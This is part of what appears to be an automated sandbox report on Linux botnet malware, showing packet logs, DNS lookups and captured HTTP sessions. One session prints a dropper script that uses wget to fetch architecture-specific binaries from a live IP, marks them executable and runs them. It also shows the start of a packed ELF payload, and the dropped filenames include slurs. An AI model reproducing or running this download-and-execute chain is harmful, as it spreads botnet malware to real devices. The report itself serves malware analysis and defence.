                                                                  Mar 29, 2024 10:40:42.460109949 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.460124016 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.460171938 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663261890 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663288116 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663309097 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663327932 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663342953 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663350105 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663363934 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663363934 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663363934 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663367987 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663398027 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663413048 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663414955 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.663464069 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663480997 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663492918 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663527012 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663559914 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663583040 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663631916 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663667917 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663721085 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663785934 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663816929 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663834095 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.663861990 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.665898085 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.866766930 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.866807938 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.866832018 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.866861105 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.866861105 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.866861105 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.866878986 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.866914034 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.866945028 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.866945028 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.866997957 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.867027044 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.867063999 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.867067099 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.867067099 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.867099047 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.867114067 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.867132902 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.867140055 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.867140055 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.867140055 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.869010925 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.869170904 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869196892 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869225979 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.869226933 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.869255066 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869273901 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869330883 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869344950 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869363070 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:42.869381905 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869427919 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869474888 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869503975 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869532108 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869571924 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869626999 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869640112 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869697094 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869720936 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869754076 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869771004 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869822979 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869837046 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869870901 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869940042 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869955063 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869973898 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.869992971 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:42.911576986 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:43.473984003 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:43.677412987 CET804318894.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:43.677505016 CET4318880192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:46.258629084 CET605747722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:40:46.271354914 CET605767722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:40:46.368355036 CET772260574104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:40:46.381114960 CET772260576104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:40:51.190463066 CET42836443192.168.2.2391.189.91.43
                                                                  Mar 29, 2024 10:40:51.309892893 CET605787722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:40:51.316135883 CET605807722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:40:51.419727087 CET772260578104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:40:51.426090956 CET772260580104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:40:56.314023018 CET605827722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:40:56.363403082 CET605847722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:40:56.423764944 CET772260582104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:40:56.473241091 CET772260584104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:40:57.329586983 CET4251680192.168.2.23109.202.202.202
                                                                  Mar 29, 2024 10:40:57.406980991 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:40:57.407084942 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:41:01.348558903 CET605867722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:01.358361959 CET605887722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:01.458576918 CET772260586104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:01.467952013 CET772260588104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:06.350548029 CET605907722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:06.358258963 CET605927722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:06.460474968 CET772260590104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:06.467988014 CET772260592104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:09.046457052 CET605947722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:09.156445980 CET772260594104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:12.639303923 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:41:12.639552116 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:41:16.197190046 CET605967722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:16.200026989 CET605987722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:16.307029009 CET772260596104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:16.309642076 CET772260598104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:21.199131012 CET606007722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:21.309079885 CET772260600104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:21.906260967 CET43928443192.168.2.2391.189.91.42
                                                                  Mar 29, 2024 10:41:24.062942028 CET606027722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:24.172661066 CET772260602104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:26.199131966 CET606047722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:26.309046984 CET772260604104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:27.870976925 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:41:27.871134996 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:41:31.205249071 CET606067722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:31.317882061 CET772260606104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:36.211771011 CET606087722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:36.321891069 CET772260608104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:39.082295895 CET606107722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:39.192043066 CET772260610104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:41.207782030 CET606127722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:41.210292101 CET606147722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:41.317652941 CET772260612104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:41.319973946 CET772260614104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:42.143110991 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:41:42.373784065 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:41:42.373930931 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:41:42.379266024 CET42836443192.168.2.2391.189.91.43
                                                                  Mar 29, 2024 10:41:46.212810040 CET606167722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:46.323796988 CET772260616104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:54.093449116 CET606187722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:54.101927042 CET606207722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:54.113995075 CET606227722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:41:54.203308105 CET772260618104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:54.211679935 CET772260620104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:54.223778963 CET772260622104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:41:57.823157072 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:41:57.823376894 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:42:01.217137098 CET606247722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:01.327033997 CET772260624104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:06.217092991 CET606267722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:06.328902960 CET772260626104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:09.104195118 CET606287722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:09.214093924 CET772260628104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:13.054975986 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:42:13.055311918 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:42:16.221076965 CET606307722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:16.225744963 CET606327722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:16.331254005 CET772260630104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:16.335892916 CET772260632104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:21.282133102 CET606347722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:21.285640955 CET606367722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:21.392024040 CET772260634104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:21.395426989 CET772260636104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:26.217081070 CET606387722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:26.222229004 CET606407722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:26.326886892 CET772260638104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:26.331991911 CET772260640104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:28.286967039 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:42:28.287205935 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:42:36.216866970 CET606427722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:36.326667070 CET772260642104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:39.128474951 CET606447722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:39.238415003 CET772260644104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:42.410974979 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:42:42.641959906 CET2142543278185.216.70.168192.168.2.23
                                                                  Mar 29, 2024 10:42:42.642287016 CET4327821425192.168.2.23185.216.70.168
                                                                  Mar 29, 2024 10:42:46.225817919 CET606467722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:46.231831074 CET606487722192.168.2.23104.168.45.11
                                                                  Mar 29, 2024 10:42:46.335709095 CET772260646104.168.45.11192.168.2.23
                                                                  Mar 29, 2024 10:42:46.341607094 CET772260648104.168.45.11192.168.2.23

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 29, 2024 10:40:18.526806116 CET4293553192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:18.722816944 CET534293580.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:18.723184109 CET3428853192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:18.919588089 CET533428880.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:18.919708014 CET4540653192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:19.118652105 CET534540680.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:19.118777037 CET4779053192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:19.318062067 CET534779080.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:19.320224047 CET5516353192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:19.517064095 CET535516380.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:27.516755104 CET5516353192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:27.755003929 CET535516380.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:27.755156040 CET5468753192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:27.951035023 CET535468780.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:27.955209970 CET4693953192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:28.151309967 CET534693980.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:28.151437044 CET5745153192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:28.347188950 CET535745180.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:28.347408056 CET3299053192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:28.542797089 CET533299080.152.203.134192.168.2.23
                                                                  Mar 29, 2024 10:40:31.431339025 CET5701453192.168.2.2380.152.203.134
                                                                  Mar 29, 2024 10:40:31.627907991 CET535701480.152.203.134192.168.2.23

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 29, 2024 10:40:31.431339025 CET192.168.2.2380.152.203.1340xf9b1Standard query (0)youare.geekA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 29, 2024 10:40:18.722816944 CET80.152.203.134192.168.2.230x1ba9Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:18.919588089 CET80.152.203.134192.168.2.230x1ba9Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:19.118652105 CET80.152.203.134192.168.2.230x1ba9Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:19.318062067 CET80.152.203.134192.168.2.230x1ba9Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:19.517064095 CET80.152.203.134192.168.2.230x1ba9Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:27.755003929 CET80.152.203.134192.168.2.230xb8f0Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:27.951035023 CET80.152.203.134192.168.2.230xb8f0Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:28.151309967 CET80.152.203.134192.168.2.230xb8f0Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:28.347188950 CET80.152.203.134192.168.2.230xb8f0Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:28.542797089 CET80.152.203.134192.168.2.230xb8f0Format error (1)youare.geeknonenoneA (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:31.627907991 CET80.152.203.134192.168.2.230xf9b1No error (0)youare.geek185.216.70.169A (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:31.627907991 CET80.152.203.134192.168.2.230xf9b1No error (0)youare.geek185.216.70.168A (IP address)IN (0x0001)false
                                                                  Mar 29, 2024 10:40:31.627907991 CET80.152.203.134192.168.2.230xf9b1No error (0)youare.geek185.216.70.250A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • 94.156.8.244

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  0192.168.2.234312094.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:17.394347906 CET157OUTGET /wtf.sh HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:17.598972082 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 1612
                                                                  Content-Type: application/x-shellscript
                                                                  Last-Modified: Thu, 14 Mar 2024 05:13:07 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:17 GMT
                                                                  Data Raw: 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 6c 6f 6c 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 38 2e 32 34 34 2f 6d 69 70 73 3b 20 63 68 6d 6f 64 20 2b 78 20 6c 6f 6c 3b 20 2e 2f 6c 6f 6c 20 30 64 61 79 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 6c 6d 61 6f 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 38 2e 32 34 34 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 2b 78 20 6c 6d 61 6f 3b 20 2e 2f 6c 6d 61 6f 20 30 64 61 79 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 66 61 67 67 6f 74 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 38 2e 32 34 34 2f 78 38 36 5f 36 34 3b 20 63 68 6d 6f 64 20 2b 78 20 66 61 67 67 6f 74 3b 20 2e 2f 66 61 67 67 6f 74 20 30 64 61 79 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 67 61 79 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 38 2e 32 34 34 2f 61 72 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 67 61 79 3b 20 2e 2f 67 61 79 20 30 64 61 79 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63
                                                                  Data Ascii: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://94.156.8.244/mips; chmod +x lol; ./lol 0daycd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://94.156.8.244/mpsl; chmod +x lmao; ./lmao 0daycd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O faggot http://94.156.8.244/x86_64; chmod +x faggot; ./faggot 0daycd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O gay http://94.156.8.244/arm; chmod +x gay; ./gay 0daycd /tmp || cd /var/run || c
                                                                  Mar 29, 2024 10:40:17.599077940 CET1112INData Raw: 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 72 65 74 61 72 64 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 38 2e 32 34 34 2f 61 72 6d 35 3b 20 63 68 6d 6f 64 20 2b 78 20 72 65 74 61
                                                                  Data Ascii: d /mnt || cd /root || cd /; wget -O retard http://94.156.8.244/arm5; chmod +x retard; ./retard 0daycd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigger http://94.156.8.244/arm6; chmod +x nigger; ./nigger 0daycd /tmp || cd /v


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  1192.168.2.234312294.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:17.926328897 CET155OUTGET /mips HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:18.129878044 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 35440
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:46 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:18 GMT
                                                                  Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 10 75 f8 00 00 00 34 00 00 00 00 00 00 10 07 00 34 00 20 00 02 00 28 00 00 00 00 00 00 00 01 00 00 00 00 00 10 00 00 00 10 00 00 00 00 89 3c 00 00 89 3c 00 00 00 05 00 01 00 00 00 00 00 01 00 00 61 40 00 46 61 40 00 46 61 40 00 00 00 00 00 00 00 00 00 00 00 06 00 01 00 00 d2 4b dc 17 55 50 58 21 13 68 0d 89 00 00 00 00 00 01 7c 34 00 01 7c 34 00 00 00 94 00 00 00 55 0e 00 00 00 1a 03 00 3f 91 45 84 68 34 8a 09 0a 40 62 ae 9e 29 20 b2 fa 5d c7 9c a4 0c 45 02 c3 96 37 d4 76 41 ed 06 72 d9 f5 40 1f 5d e1 85 e5 82 8b cc 52 c8 be 34 82 73 fa 36 be 6a 1f b3 70 9a 0a f6 23 a4 97 36 a3 3e e7 c0 fd da 75 43 f1 76 1b cd f7 6a 97 99 01 00 00 01 6f 2c 00 00 70 ad 0e 00 00 00 1a 03 00 1e 06 fc 00 79 ad eb 60 cb 7d 19 40 1a 3f 23 ec a1 c9 d0 66 a6 7e b1 ac ea 03 1e 82 88 7b b4 64 80 4a 12 67 88 93 8a fa cf 49 5d c7 7d c8 58 ea 54 e3 0a 19 a7 79 f9 c7 96 bd 89 a6 6d e7 9c 2a 5b a6 04 7f 6a 61 6f 9d 46 a3 db 15 9f c3 37 f7 b6 c4 37 9a c0 b4 12 52 86 95 6e d4 c0 d9 fc c6 d8 11 02 98 52 7f 09 64 dd 34 0a 17 cc 0e a0 cd 23 45 d2 90 db 72 00 23 d2 5c 0b 05 68 85 86 27 ca f0 b0 13 a4 3c 9c a3 f1 e7 4a 39 40 fa 7a cc 64 32 b3 ce 40 e1 c7 68 7e 31 21 71 e2 5a 35 2a 6d 9e 0b c9 d4 74 ca bf 93 fe 15 65 bb d7 4a bf 64 59 7b e0 37 1d 0d 9d df 49 57 14 0b 8f 50 5e 6c 4d d2 94 4f b1 fc 1b 8e 67 55 75 81 0e c3 78 74 ab 0f 44 5f 41 99 22 f2 c5 08 2b 41 b1 3d d2 80 89 ac b4 57 85 83 64 f3 7b a1 96 a9 7d 83 07 ee 9e 0b b7 94 01 de 9c f5 3d 9f 2a 76 7d 44 6e 36 30 88 ee
                                                                  Data Ascii: ELFu44 (<<a@Fa@Fa@KUPX!h|4|4U?Eh4@b) ]E7vAr@]R4s6jp#6>uCvjo,py`}@?#f~{dJgI]}XTym*[jaoF77RnRd4#Er#\h'<J9@zd2@h~1!qZ5*mteJdY{7IWP^lMOgUuxtD_A"+A=Wd{}=*v}Dn60
                                                                  Mar 29, 2024 10:40:18.130177975 CET1286INData Raw: d8 39 7d c9 0f c4 62 47 b1 de 62 59 1e 9d 4b b5 ef 41 05 4e b9 02 6d a8 13 6c 19 31 19 75 a6 fd 1b 51 64 e4 a9 cc 13 04 e8 69 ad d5 87 2f 2f f8 9b 7e c8 e9 21 05 5a de cd 0b 77 97 42 0b 1e eb 1d 8c e2 6c 4c 99 f2 e4 88 b0 97 a4 4a 40 8e 5c 88 a2
                                                                  Data Ascii: 9}bGbYKANml1uQdi//~!ZwBlLJ@\)</})vlD}&E#/L=Tf[t5:ayVYkW{t:\1!y)D pOA4=3(uvw]}wp<IP11%Nn?>
